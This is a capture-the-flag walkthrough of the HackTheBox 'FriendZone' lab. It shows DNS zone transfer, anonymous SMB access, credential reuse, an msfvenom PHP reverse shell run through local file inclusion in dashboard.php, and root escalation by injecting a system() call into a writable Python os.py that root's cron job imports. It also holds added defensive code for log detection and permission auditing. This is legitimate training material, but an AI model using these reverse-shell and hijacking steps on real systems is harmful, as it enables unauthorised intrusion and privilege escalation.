FriendZone

FriendZone is an easy HTB lab that focuses on DNS enumeration, injection payloads and privilege escalation. In this walkthrough we go through exploiting the exposed services and gaining access to the root user.

Recon

The first step in any penetration testing process is reconnaissance. We start by running an nmap scan against the target machine to identify open ports and services.

$ sudo nmap -p- -sV -sC 10.129.41.205

Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-10 22:44 GMT
Nmap scan report for 10.129.41.205
Host is up (0.092s latency).
Not shown: 65528 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a96824bc971f1e54a58045e74cd9aaa0 (RSA)
|   256 e5440146ee7abb7ce91acb14999e2b8e (ECDSA)
|_  256 004e1a4f33e8a0de86a6e42a5f84612b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_http-title: 404 Not Found
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -40m00s, deviation: 1h09m16s, median: 0s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2024-01-10T22:46:26
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2024-01-11T00:46:26+02:00
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.91 seconds

Enumerating the website also turns up the email address info@friendzoneportal.red.

Given this domain and the BIND DNS service in the nmap output, let's check whether the name server allows a zone transfer, which would reveal further hostnames.

$ dig axfr friendzone.red @10.129.41.205

; <<>> DiG 9.18.12-1~bpo11+1-Debian <<>> axfr friendzone.red @10.129.41.205
;; global options: +cmd
friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.		604800	IN	AAAA	::1
friendzone.red.		604800	IN	NS	localhost.
friendzone.red.		604800	IN	A	127.0.0.1
administrator1.friendzone.red. 604800 IN A	127.0.0.1
hr.friendzone.red.	604800	IN	A	127.0.0.1
uploads.friendzone.red.	604800	IN	A	127.0.0.1
friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 89 msec
;; SERVER: 10.129.41.205#53(10.129.41.205) (TCP)
;; WHEN: Wed Jan 10 22:57:36 GMT 2024
;; XFR size: 8 records (messages 1, bytes 289)

Adding the newly found hostnames to /etc/hosts:

$ sudo tee --append /etc/hosts <<< "10.129.41.205 uploads.friendzone.red hr.friendzone.red administrator1.friendzone.red friendzone.red"

Enumerating the SMB shares:

$ IP=10.129.41.205
$ sudo crackmapexec smb $IP -u '' -p '' --shares

SMB         10.129.41.205   445    FRIENDZONE       [*] Windows 6.1 (name:FRIENDZONE) (domain:) (signing:False) (SMBv1:True)
SMB         10.129.41.205   445    FRIENDZONE       [+] \: 
SMB         10.129.41.205   445    FRIENDZONE       [+] Enumerated shares
SMB         10.129.41.205   445    FRIENDZONE       Share           Permissions     Remark
SMB         10.129.41.205   445    FRIENDZONE       -----           -----------     ------
SMB         10.129.41.205   445    FRIENDZONE       print$                          Printer Drivers
SMB         10.129.41.205   445    FRIENDZONE       Files                           FriendZone Samba Server Files /etc/Files
SMB         10.129.41.205   445    FRIENDZONE       general         READ            FriendZone Samba Server Files
SMB         10.129.41.205   445    FRIENDZONE       Development     READ,WRITE      FriendZone Samba Server Files
SMB         10.129.41.205   445    FRIENDZONE       IPC$                            IPC Service (FriendZone server (Samba, Ubuntu))

Reading the contents of the general share, which is readable without credentials:

$ sudo smbclient -N \\\\$IP\\general -U ''
smb: \> get creds.txt

The downloaded creds.txt contains:

$ cat creds.txt 
creds for the admin THING:

admin:WORKWORKH*********@#

https://administrator1.friendzone.red/ has a login screen that accepts these credentials. After logging in, exploring the available URLs leads to dashboard.php, whose pagename parameter selects a server-side file to include: https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp and https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=login both render the named page, and this parameter is our injection point.

User

Preparing a reverse shell to place on the Development share, which we have write access to.

$ msfvenom -p php/reverse_php LHOST=10.10.14.140 LPORT=4444 -f raw > rev_shell.php

$ sudo smbclient -N \\\\10.129.41.234\\development -U 'admin%WORKWORKH*********@#'
smb: \> put rev_shell.php

Opening https://administrator1.friendzone.red/dashboard.php?image_id=../../../Development/c.jpg&pagename=/etc/Development/rev_shell makes the application include /etc/Development/rev_shell.php (it appends .php to the pagename value), which is the file we uploaded to the share, so the reverse shell connects back to our listener.
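
As an added example (not code from this write-up or from the box), the following Python models the include logic the pagename parameter appears to use, shows a hardened resolver beside it, and scans constructed Apache access-log lines for the same abuse; PAGES_DIR, ALLOWED_PAGES and the log lines are assumptions.

```python
# Added example, not code from the write-up or the target: a model of the
# dashboard.php include logic inferred above (".php" appended to pagename), a
# hardened resolver, and a log check for requests that abuse the parameter.
import posixpath
from urllib.parse import parse_qs, urlsplit

PAGES_DIR = "/var/www/admin/pages"                   # assumed location
ALLOWED_PAGES = {"login", "timestamp", "dashboard"}  # assumed page names


def resolve_page_unsafe(pagename):
    """Vulnerable logic: the request value becomes the include path, so an
    absolute path such as /etc/Development/rev_shell pulls in any file."""
    return pagename + ".php"


def resolve_page_safe(pagename):
    """Hardened logic: only allow-listed page names, path always built under
    PAGES_DIR. Returns None when the request is rejected."""
    if pagename not in ALLOWED_PAGES:
        return None
    path = posixpath.normpath(posixpath.join(PAGES_DIR, pagename + ".php"))
    return path if path.startswith(PAGES_DIR + "/") else None


def suspicious_pagenames(access_log):
    """Return (client_ip, pagename) for requests whose pagename is an absolute
    path or contains a '..' component: the signature of this bug in logs."""
    hits = []
    for line in access_log.splitlines():
        parts = line.split('"')
        if len(parts) < 2:
            continue
        request = parts[1].split()  # e.g. 'GET /dashboard.php?... HTTP/1.1'
        if len(request) < 2:
            continue
        query = parse_qs(urlsplit(request[1]).query)
        for value in query.get("pagename", []):
            if value.startswith("/") or ".." in value.split("/"):
                hits.append((line.split()[0], value))
    return hits


# Constructed sample log lines in Apache access-log format (not real traffic).
SAMPLE_LOG = """\
10.10.14.140 - - [11/Jan/2024:00:10:01 +0200] "GET /dashboard.php?image_id=a.jpg&pagename=login HTTP/1.1" 200 512
10.10.14.140 - - [11/Jan/2024:00:10:09 +0200] "GET /dashboard.php?image_id=a.jpg&pagename=/etc/Development/rev_shell HTTP/1.1" 200 0
10.10.14.141 - - [11/Jan/2024:00:11:30 +0200] "GET /dashboard.php?image_id=../../../x.jpg&pagename=../../../etc/passwd HTTP/1.1" 200 0
"""
```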

$ nc -lvnp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.41.234.
Ncat: Connection from 10.129.41.234:52164.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Enumerating the machine as www-data, we find the following in a config file:

$ cat mysql_data.conf

for development process this is the mysql creds for user friend
db_user=friend
db_pass=*********!0.213$
db_name=FZ

Logging in over SSH with these credentials and reading the user flag:

$ ssh friend@10.129.41.234
*********!0.213$

$ cat user.txt
~~~~~~~~~~~~FLAG~~~~~~~~~~~~

Privilege Escalation

Running pspy shows that root executes /opt/server_admin/reporter.py from cron:

2024/01/11 05:00:01 CMD: UID=0     PID=17332  | /usr/bin/python /opt/server_admin/reporter.py 
2024/01/11 05:00:01 CMD: UID=0     PID=17331  | /bin/sh -c /opt/server_admin/reporter.py 
2024/01/11 05:00:01 CMD: UID=0     PID=17330  | /usr/sbin/CRON -f 

linpeas.sh lists the files our user can write to: apart from the files in the share, /usr/lib/python2.7/os.py is writable. Since reporter.py runs as root under Python 2.7 and imports os, any code added to that module is executed as root on the next cron run.

We append a call to system("cp /root/root.txt /home/friend/dummy.txt") to /usr/lib/python2.7/os.py (system is defined in that module), so the next run copies the root flag into our home directory.
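
The following Python is an added defensive check, not part of the write-up: it audits a library directory for files that non-root users can modify, which is the condition that makes the os.py hijack above possible. When run as a script it walks the sys.path of whichever interpreter executes it; the directory argument is the only assumption.

```python
# Added example, not from the write-up: audit a Python library directory for
# files that a non-root user could modify. A root cron job that imports a
# module from a writable file (here /usr/lib/python2.7/os.py) hands that user
# root, so this check belongs in a hardening baseline. Written to run under
# both Python 2.7 (the cron job's interpreter) and Python 3.
from __future__ import print_function
import os
import stat
import sys


def writable_library_files(directory, require_root_owner=True):
    """Return (path, reason) for each regular file under `directory` that is
    world-writable, group-writable by a non-root group, or (optionally)
    not owned by root."""
    findings = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks and special files are not checked here
            reasons = []
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
                reasons.append("group-writable")
            if require_root_owner and st.st_uid != 0:
                reasons.append("not owned by root")
            if reasons:
                findings.append((path, ", ".join(reasons)))
    return findings


if __name__ == "__main__":
    # Audit every directory the running interpreter imports from; run it with
    # the same interpreter the cron job uses, e.g. /usr/bin/python on this box.
    for entry in sys.path:
        if os.path.isdir(entry):
            for path, reason in writable_library_files(entry):
                print("%s: %s" % (path, reason))
```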

After the next cron run, reading the copied flag:

$ cat ~/dummy.txt
~~~~~~~~~~~~FLAG~~~~~~~~~~~~